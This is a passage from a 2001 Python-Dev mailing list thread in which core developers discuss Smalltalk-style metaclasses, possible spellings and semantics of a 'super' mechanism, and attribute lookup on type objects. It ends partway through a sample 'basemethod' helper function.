Its __getattr__() will have to decide whether or not to expose its own methods and attributes or not. The only catch here is that currently instances and classes have control of whether and how to bind found functions as methods or not. We should probably change that to pass complete control over to the meta-class object and remove the special control flows currently found in instance_getattr2() and class_lookup(). In general, I think that meta-classes should not expose their attributes to the class objects they create, since this causes way too many problems. Perhaps I'm oversimplifying things here, but I have a feeling that we can go a long way by actually trying to see meta-classes as first class members in the interpreter design and moving all the binding and lookup mechanisms over to this object type. The special casing should then take place in the meta-class rather than its creations. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 12:57:42 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 12:57:42 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> > > The most common use for these seems to be for calling > > inherited methods, so perhaps something like > > > > inherited MyBaseClass.foo(arg, ...) > > > > which would be equivalent to > > > > getmethod(MyBaseClass, 'foo')(self, arg, ...) > > > > where getmethod() is a new builtin like getattr() > > except that it looks in the __classdict__, and 'self' > > is really whatever the first argument of the containing > > method was. > > The second most common use is to reference class variables > (e.g.
imagine a class that keeps counters of how many instances have > been created and deleted in C.initcount and C.delcount). But these > should not have to change, since they really are class attributes. > > > Now that we have __future__, would such a change be contemplatable? > > Or is it too radical to even think about? > > If we can find a way to spell "super.method", we should be ready for > the future. I can't think of something right off the bat > unfortunately. Could we make super(self, MyBaseClass).foo(arg, ...) behave similar to MyBaseClass.foo(self, arg, ...) Wrapping this stuff in a function would probably also enable to use the same pattern in existing python versions. Thomas From thomas.heller at ion-tof.com Wed May 2 13:12:21 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 13:12:21 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> > Jim Althoff (a big commercial user of J[P]ython) sent me a summary of > how metaclasses work in Smalltalk. He should know, since he invented > them! :-) I include it below, with his permission. I found this very interesting reading. [From Jim Althoff] > In the list below, indentation indicates class hieararchy (superclass -- > subclass) The indentation, unfortunately, seems to be destroyed. > > plain-class > ---------------- > > o Class > o Object isInstanceOf > o ObjectMetaClass isInstanceOf MetaClass > o Class isInstanceOf > o ClassMetaClass isInstanceOf MetaClass > o MetaClass isInstanceOf > o MetaClassMetaClass isInstanceOf MetaClass > . . . > o Rectangle isInstanceOf > o RectangleMetaClass isInstanceOf MetaClass > o SpecializedRectangle isInstanceOf > o SpecializedRectangleMetaClass isInstanceOf MetaClass A question for Jim (this is more Smalltalk than Python related): How does the Behaviour class fit into this picture? 
Thomas From guido at digicool.com Wed May 2 14:15:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 07:15:57 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200." <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com> > > If we can find a way to spell "super.method", we should be ready for > > the future. I can't think of something right off the bat > > unfortunately. > > Could we make > > super(self, MyBaseClass).foo(arg, ...) > > behave similar to > > MyBaseClass.foo(self, arg, ...) > > Wrapping this stuff in a function would probably also > enable to use the same pattern in existing python versions. Yes, I can see how to write super() using current tools (or 1.5.2 even). The problem is that this makes super calls even more wordy than they already are! I can't think of anything that wouldn't require compiler support though. --Guido van Rossum (home page: http://www.python.org/~guido/) From gward at python.net Wed May 2 14:57:41 2001 From: gward at python.net (Greg Ward) Date: Wed, 2 May 2001 08:57:41 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500 References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> Message-ID: <20010502085741.B515@gerg.ca> On 02 May 2001, Guido van Rossum said: > Yes, I can see how to write super() using current tools (or 1.5.2 > even).
The problem is that this makes super calls even more wordy > than they already are! I can't think of anything that wouldn't > require compiler support though. I was just doing some gedanken with various ways to spell "super", and I think my favourite is the same as Java's (as I remember it): class MyClass (BaseClass): def foo (self, arg1, arg2): super.foo(arg1, arg2) Since I don't know much about Python's guts, I can't say how implementable this is, but I like the spelling. The semantics would be something like this (with adjustments to the reality of Python's guts): * 'super' is a magic object that only makes sense inside a 'def' inside a 'class' (at least for now; perhaps it could be generalized to work at class scope as well as method scope, but let's keep it simple) * super's notional __getattr__() does something like this: - peek at the calling stack frame and fetch the calling function (MyClass.foo) and the first argument to that function (self) - [is this possible?] ensure that calling_function is a bound method, and that it's bound to the self object we just plucked from the stack; raise a "misuse of super object" exception if not - walk the superclass tree starting at self.__class__.__bases__ (ie. skip self's class), looking for an object with the name passed to this __getattr__() call -- 'foo' - when found, return it - if not found, raise AttributeError The ability to peek at the calling stack frame is essential to this scheme, in order to fetch the "current object" (self) without needing to have it explicitly passed. Is this as bothersome from C as it is from Python? Greg -- Greg Ward - nerd gward at python.net http://starship.python.net/~gward/ In space, no one can hear you fart. From mal at lemburg.com Wed May 2 15:07:27 2001 From: mal at lemburg.com (M.-A. 
Lemburg) Date: Wed, 02 May 2001 15:07:27 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <3AF0068F.32388C87@lemburg.com> Greg Ward wrote: > > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > ... This doesn't work in Python since Python has multiple inheritence, e.g. super in class A(B,C): def foo(self): super.foo() is ambiguous. I'd rather suggest adding a function for finding the basemethod of a method. This is probably the most common task in this context. 
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 15:12:40 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 15:12:40 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook> [Greg Ward] > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) > > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] 
ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not > - walk the superclass tree starting at self.__class__.__bases__ Careful! The search in the above context must start at MyClass.__bases__ which may not be the same as self.__class__.__bases__. Thomas From guido at digicool.com Wed May 2 16:29:03 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:29:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400." <20010502085741.B515@gerg.ca> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> [Greg Ward, welcome back!] > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) I'm sure that's everybody's favorite way to spell it! It's mine too. :-) > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) Yes, that's about the only way it can be made to work. The compiler will have to (1) detect that 'super' is a free variable, and (2) make it a local and initialize it with the proper magic.
Or, to relieve the burden from the symbol table, we could make super a keyword, at the cost of breaking existing code. I don't think super is needed outside methods. > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not I don't think you can make that test, but making it a 'magic local' as I suggested above would avoid the problem. > - walk the superclass tree starting at self.__class__.__bases__ > (ie. skip self's class), looking for an object with the name > passed to this __getattr__() call -- 'foo' > - when found, return it > - if not found, raise AttributeError Yup, that's the easy part. :-) > The ability to peek at the calling stack frame is essential to this > scheme, in order to fetch the "current object" (self) without needing to > have it explicitly passed. Is this as bothersome from C as it is from > Python? No, in C it's easy. The problem is that there is no information in the frame that tells you where the currently executing function was defined -- all you have is the code object, which is context-independent. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 16:30:20 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:30:20 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200." 
<3AF0068F.32388C87@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com> > This doesn't work in Python since Python has multiple inheritence, > e.g. super in > > class A(B,C): > def foo(self): > super.foo() > > is ambiguous. I'm not sure what you mean. The search is totally well-defined: first search B for a foo method, then search C. > I'd rather suggest adding a function for finding the basemethod > of a method. This is probably the most common task in this context. I've never heard of the concept of basemethod, but if I may venture a guess, it would be the same definition as I give above. --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy at digicool.com Wed May 2 15:38:42 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Wed, 2 May 2001 09:38:42 -0400 (EDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <15088.3554.953359.757584@slothrop.digicool.com> >>>>> "GvR" == Guido van Rossum writes: >> Since I don't know much about Python's guts, I can't say how >> implementable this is, but I like the spelling. 
The semantics >> would be something like this (with adjustments to the reality of >> Python's guts): >> >> * 'super' is a magic object that only makes sense inside a 'def' >> inside a 'class' (at least for now; perhaps it could be >> generalized to work at class scope as well as method scope, but >> let's keep it simple) GvR> Yes, that's about the only way it can be made to work. The GvR> compiler will have to (1) detect that 'super' is a free GvR> variable, and (2) make it a local and initialize it with the GvR> proper magic. Or, to relieve the burden from the symbol table, GvR> we could make super a keyword, at the cost of breaking existing GvR> code. GvR> I don't think super is needed outside methods. It seems helpful to clarify here, since this came up in conversation at PythonLabs just the other day with the yield statement. If we try to avoid keywords, we have to take the "well, I don't see anyone assigning to this name" route. If the compiler does not detect any assignment to a nearly reserved word, like super, it would give the use of that word special meaning. There are a bunch of little problems. A module could (not necessarily should) be designed to have a global name poked into its namespace; this would break, because the name would already have transmogrified from a regular variable into a special one. The use of exec or import star would make it impossible for the word to take on its special meaning. So keywords really are a lot clearer, but they have the potential to be incompatible. 
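Thomas Heller's correction earlier in the thread, that the search must start at MyClass.__bases__ rather than self.__class__.__bases__, is why the defining class is a necessary input to any super that lacks compiler support. The following is a minimal sketch in modern Python 3, not code from this thread: `classic_lookup`, `naive_super` and `explicit_super` are hypothetical names, and the lookup models the depth-first, left-to-right search Python 2.1 uses for classic classes. The helper that is told the defining class works for an inheriting subclass. The one that starts at the instance's own class finds the same method again and recurses until Python raises RecursionError.

```python
# Sketch only: a "super" helper built on the classic depth-first,
# left-to-right lookup over __bases__ (hypothetical names throughout).


def classic_lookup(cls, name):
    """Return the first definition of name in cls or its bases."""
    if name in cls.__dict__:
        return cls.__dict__[name]
    for base in cls.__bases__:
        try:
            return classic_lookup(base, name)
        except AttributeError:
            pass
    raise AttributeError(name)


class _SuperProxy:
    """Searches `bases` in order and binds what it finds to `obj`."""

    def __init__(self, bases, obj):
        self._bases = bases
        self._obj = obj

    def __getattr__(self, name):
        for base in self._bases:
            try:
                func = classic_lookup(base, name)
            except AttributeError:
                continue
            return func.__get__(self._obj, type(self._obj))  # bind like a method
        raise AttributeError(name)


def naive_super(obj):
    # Starts at self.__class__.__bases__: wrong once a subclass inherits the caller.
    return _SuperProxy(type(obj).__bases__, obj)


def explicit_super(cls, obj):
    # Starts at the defining class's bases, as Thomas Heller points out.
    return _SuperProxy(cls.__bases__, obj)


class Base:
    def greet(self):
        return ["Base"]


class MyClass(Base):
    def greet(self):
        return ["MyClass"] + explicit_super(MyClass, self).greet()


class NaiveClass(Base):
    def greet(self):
        return ["NaiveClass"] + naive_super(self).greet()


class Sub(MyClass):
    pass


class NaiveSub(NaiveClass):
    pass


print(Sub().greet())         # ['MyClass', 'Base']
print(NaiveClass().greet())  # ['NaiveClass', 'Base']
try:
    NaiveSub().greet()       # NaiveClass.greet keeps finding itself
except RecursionError:
    print("naive_super recursed forever")
```

Passing the class explicitly is the cost Guido mentions: the call gets wordier, but it needs neither frame inspection nor help from the compiler.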
Jeremy From fredrik at pythonware.com Wed May 2 16:00:55 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 2 May 2001 16:00:55 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff> guido wrote: > > class MyClass (BaseClass): > > def foo (self, arg1, arg2): > > super.foo(arg1, arg2) > > I'm sure that's everybody's favorite way to spell it! not mine. my brain contains far too much Python 1.5.2 code for it to accept that some variables are dynamically scoped, while others are lexically scoped. why not spell it out: self.__super__.foo(arg1, arg2) or self.super.foo(arg1, arg2) or super(self).foo(arg1, arg2) > Or, to relieve the burden from the symbol table, we could make super > a keyword, at the cost of breaking existing code. hey, how about introducing $ as a keyword prefix for newly introduced keywords? $super.foo(arg1, arg2) (this can of course be mapped to either of my previous suggestions; "$foo" either means "self.foo" or "foo(self)"...) and to save a little typing, only use it for keywords that start with an "s" (should leave us plenty of expansion room): $uper.foo(arg1, arg2) otoh, if "super" is common enough to motivate introducing magic objects into python, maybe "$" should mean "super."? $foo(arg1, arg2) and while we're at it, let's introduce "@" for "self.". gotta run -- time for my monthly reboot /F From guido at digicool.com Wed May 2 17:03:37 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:03:37 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200." 
<3AEFCEBD.2E5979C9@lemburg.com> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com> [me] > > The best rule I can think of so far is that DictType.__dict__ gives > > the *true* set of attribute descriptors for dictionary objects, and is > > thus similar to Smalltalks's class.methodDict that Jim describes > > below. DictType.foo is a shortcut that can resolve to either > > DictType.__dict__['foo'] or to an attribute (maybe a method) of > > DictType described in TypeType.__dict__['foo'], whichever is defined. > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. [MAL] > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that both a dictionary object (call it d) and its type (DictType) have a __repr__ method: repr(d) returns "d", and repr(DictType) returns "". 
Given the analogy with classes, where str(x) invokes x.__str__() and x.__str__() can also be called directly, it is not unreasonable to expect that this works in general, so that repr(d) can be spelled as

    d.__repr__()

and repr(DictType) as

    DictType.__repr__()

And, given another analogy with classes, where x.foo() is equivalent to x.__class__.foo(x), the two forms above should also be equivalent to

    d.__class__.__repr__(d)

and

    DictType.__class__.__repr__(DictType)

But since d.__class__ is DictType, we now have two conflicting ways to derive a meaning for DictType.__repr__: the first one going

    repr(DictType) => DictType.__repr__()

and the second one going

    repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d)

The rule quoted above chooses the second meaning, from the very pragmatic point that once I allow subclassing from DictType, such a subclass might very well want to override __repr__ to wrap the base class __repr__, and the conventional way to reference that (barring the implementation of 'super') is DictType.__repr__. Direct invocation of an object's own __repr__ method as x.__repr__() is much less common. The implementation of repr(x) can do the right thing, which is to look for x.__class__.__dict__['__repr__'].

> The problem with the misleading error message would only show
> up in case DictType does not define a __repr__ method. Then the
> inherited one from TypeType would come into play and cause
> the problem you mention above.

No, the issue is not inheritance: I haven't implemented inheritance yet. DictType is an instance of TypeType but doesn't inherit from it.

> Thinking in terms of meta-classes, I believe we should implement
> this mechanism in the meta-class (TypeType in this case). Its
> __getattr__() will have to decide whether or not to expose its
> own methods and attributes or not.

That's exactly how I solved it: type_getattro() implements the rule quoted at the top.
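The rule Guido refers to can be modeled in a few lines. When both dicts define a name, a method in DictType.__dict__ wins; for anything else, TypeType.__dict__ wins. This is a toy sketch in modern Python 3, not the C implementation of type_getattro(). `ToyType` and `toy_type_getattr` are hypothetical names, and plain dicts stand in for DictType.__dict__ and TypeType.__dict__. "Describes a method" is approximated as "is a plain Python function", and entries are returned unbound.

```python
import types


class ToyType:
    """Hypothetical stand-in for a type object such as DictType."""

    def __init__(self, name, own_dict, meta_dict):
        self.name = name
        self.own = own_dict    # plays the role of DictType.__dict__
        self.meta = meta_dict  # plays the role of TypeType.__dict__


def toy_type_getattr(tp, name):
    """Resolve tp.<name> using the rule described in the thread."""
    in_own, in_meta = name in tp.own, name in tp.meta
    if in_own and in_meta:
        # Conflict: a method in the type's own dict wins ...
        if isinstance(tp.own[name], types.FunctionType):
            return tp.own[name]
        # ... otherwise the metatype's entry wins.
        return tp.meta[name]
    if in_own:
        return tp.own[name]
    if in_meta:
        return tp.meta[name]
    raise AttributeError(name)


def dict_repr(d):
    # Hypothetical __repr__ used for dictionary *instances*.
    return "{...}"


def type_repr(tp):
    # Hypothetical __repr__ used for type objects themselves.
    return "<type '%s'>" % tp.name


TYPE_TYPE_DICT = {"__repr__": type_repr, "__class__": "TypeType"}
DictType = ToyType(
    "dictionary",
    {"__repr__": dict_repr, "__class__": "descriptor for d.__class__"},
    TYPE_TYPE_DICT,
)

# DictType.__repr__ resolves to the instance method, so a subclass can wrap it.
print(toy_type_getattr(DictType, "__repr__") is dict_repr)  # True
# DictType.__class__ is not a method, so the metatype's entry wins.
print(toy_type_getattr(DictType, "__class__"))               # TypeType
# repr(DictType) bypasses the shortcut and asks the metatype's dict directly.
print(DictType.meta["__repr__"](DictType))                   # <type 'dictionary'>
```

The last line mirrors Guido's remark that repr(x) should go straight to x.__class__.__dict__['__repr__'] instead of relying on the attribute shortcut.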
> The only catch here is that currently instances and classes have > control of whether and how to bind found functions as methods or not. > We should probably change that to pass complete control over to the > meta-class object and remove the special control flows currently found > in instance_getattr2() and class_lookup(). Um, yeah, that's where I think this will end up causing more trouble. Right now, if x is an instance, some attributes like x.__class__ and x.__dict__ special-cased in instance_getattr(). The mechanism I propose removes the need for (most of) such special cases, and instead allows the class to provide "descriptors" for instance attributes. So, for example, if instances of a class C have an attribute named foo, C.__dict__['foo'] contains the descriptor for that attribute, and that is how the implementation decides how to interpret x.foo (assuming x is an instance of C). We may be able to access this same descriptor as C.foo, but that's really only important for backwards compatibility with the way classes work today. > In general, I think that meta-classes should not expose their > attributes to the class objects they create, since this causes > way to many problems. I agree. > Perhaps I'm oversimplifying things here, but I have a feeling that > we can go a long way by actually trying to see meta-classes as > first class members in the interpreter design and moving all the > binding and lookup mechanisms over to this object type. The special > casing should then take place in the meta-class rather than its > creations. Yes, that's where I'm heading! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:02:41 2001 From: mal at lemburg.com (M.-A. 
Lemburg) Date: Wed, 02 May 2001 16:02:41 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF01381.592AE31B@lemburg.com> Guido van Rossum wrote: > > > This doesn't work in Python since Python has multiple inheritence, > > e.g. super in > > > > class A(B,C): > > def foo(self): > > super.foo() > > > > is ambiguous. > > I'm not sure what you mean. The search is totally well-defined: first > search B for a foo method, then search C. I thought you were talking about an abstract super class, which is how Java uses this term. Rereading some of the posts, I think you are indeed referring to the method which foo overrides -- this is what I call basemethod (since it is implemented in one of the base classes). > > I'd rather suggest adding a function for finding the basemethod > > of a method. This is probably the most common task in this context. > > I've never heard of the concept of basemethod, but if I may venture a > guess, it would be the same definition as I give above. The basemethod can be defined as the first method of the same name found in the inheritance tree using the standard Python lookup strategy (left-right, depth first) when continuing the lookup search at the node in the inheritance tree which defines the method querying the basemethod. In other words: you let Python continue the search for the method as if it hadn't found the occurrence calling the basemethod() API. Hmm, still not clear enough... better let Tim jump in here (we've had a discussion about basemethod() some months or years ago). Tim ?
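The definition above can be checked on a diamond-shaped hierarchy: continue the classic left-right, depth-first search just past the class that defines the calling method. This is a minimal sketch in modern Python 3 with hypothetical names `classic_order` and `find_basemethod`. It ignores Python 3's implicit `object` base, does no caching, and is not the mx.Tools implementation. The walk keeps duplicates, so a base class reachable through two branches appears twice.

```python
def classic_order(cls):
    """Depth-first, left-to-right walk over __bases__, keeping duplicates."""
    order = [cls]
    for base in cls.__bases__:
        if base is not object:  # skip Python 3's implicit root class
            order.extend(classic_order(base))
    return order


def find_basemethod(objclass, defclass, name):
    """Return the next definition of `name` after the first occurrence of
    `defclass` in the classic lookup order of `objclass`."""
    order = classic_order(objclass)
    start = order.index(defclass) + 1  # ValueError if defclass is not a base
    for cls in order[start:]:
        if name in cls.__dict__:
            return cls.__dict__[name]
    raise AttributeError(name)


class A:
    def foo(self):
        return "A.foo"


class B(A):
    def foo(self):
        return "B.foo"


class C(A):
    def foo(self):
        return "C.foo"


class D(B, C):
    def foo(self):
        return "D.foo"


print([k.__name__ for k in classic_order(D)])  # ['D', 'B', 'A', 'C', 'A']
print(find_basemethod(D, D, "foo")(D()))       # B.foo
print(find_basemethod(D, B, "foo")(D()))       # A.foo
```

The last line shows the ambiguity. Under this classic order, the method that B.foo overrides is A.foo, even though D also inherits from C. For comparison, Python 3's own D.__mro__ (the C3 linearization, adopted for new-style classes in Python 2.3) is D, B, C, A, object. Calling super(B, self).foo() there would reach C.foo instead.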
Note that there are many ways of defining what a basemethod is, due to the ambiguities that are caused by multiple inheritance (e.g. the same base class may appear in different branches of the inheritance tree). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 17:05:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:05:30 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200." <000d01c0d310$4ee127d0$0900a8c0@spiff> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com> > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) > > > Or, to relieve the burden from the symbol table, we could make super > > a keyword, at the cost of breaking existing code. > > hey, how about introducing $ as a keyword prefix for newly introduced > keywords? > > $super.foo(arg1, arg2) > > (this can of course be mapped to either of my previous suggestions; > "$foo" either means "self.foo" or "foo(self)"...)
> > and to save a little typing, only use it for keywords that start with > an "s" (should leave us plenty of expansion room): > > $uper.foo(arg1, arg2) > > otoh, if "super" is common enough to motivate introducing magic objects > into python, maybe "$" should mean "super."? > > $foo(arg1, arg2) > > and while we're at it, let's introduce "@" for "self.". > > gotta run -- time for my monthly reboot /F LOL! But you forgot the spelling of self.__super.foo(arg1, arg2) which would pass in the class name that's the other necessary input to a proper implementation of super. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:04:29 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:04:29 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF013ED.8A190FE2@lemburg.com> Here's an implementation of what I currently use to track down the basemethod (taken from mx.Tools): import sys, types _basemethod_cache = {} def basemethod(object,method=None, cache=_basemethod_cache,InstanceType=types.InstanceType, ClassType=types.ClassType,None=None): """ Return the unbound method that is defined *after* method in the inheritance order of object with the same name as method (usually called base method or overridden method). object can be an instance, class or bound method. method, if given, may be a bound or unbound method. If it is not given, object must be a bound method. Note: Unbound methods must be called with an instance as first argument. The function uses a cache to speed up processing.
Changes done to the class structure after the first hit will not be noticed by the function. XXX Rewrite in C to increase performance. """ if method is None: method = object object = method.im_self defclass = method.im_class name = method.__name__ if type(object) is InstanceType: objclass = object.__class__ elif type(object) is ClassType: objclass = object else: objclass = object.im_class # Check cache cacheentry = (defclass, name) basemethod = cache.get(cacheentry, None) if basemethod is not None: if not issubclass(objclass, basemethod.im_class): if __debug__: sys.stderr.write( 'basemethod(%s, %s): cached version (%s) mismatch: ' '%s !-> %s\n' % (object, method, basemethod, objclass, basemethod.im_class)) else: return basemethod # Find defining class path = [objclass] while 1: if not path: raise AttributeError,method c = path[0] del path[0] if c.__bases__: # Prepend bases of the class path[0:0] = list(c.__bases__) if c is defclass: # Found (first occurrence of) defining class in inheritance # graph break # Scan rest of path for the next occurrence of a method with the # same name while 1: if not path: raise AttributeError,name c = path[0] basemethod = getattr(c, name, None) if basemethod is not None: # Found; store in cache and return cache[cacheentry] = basemethod return basemethod del path[0] raise 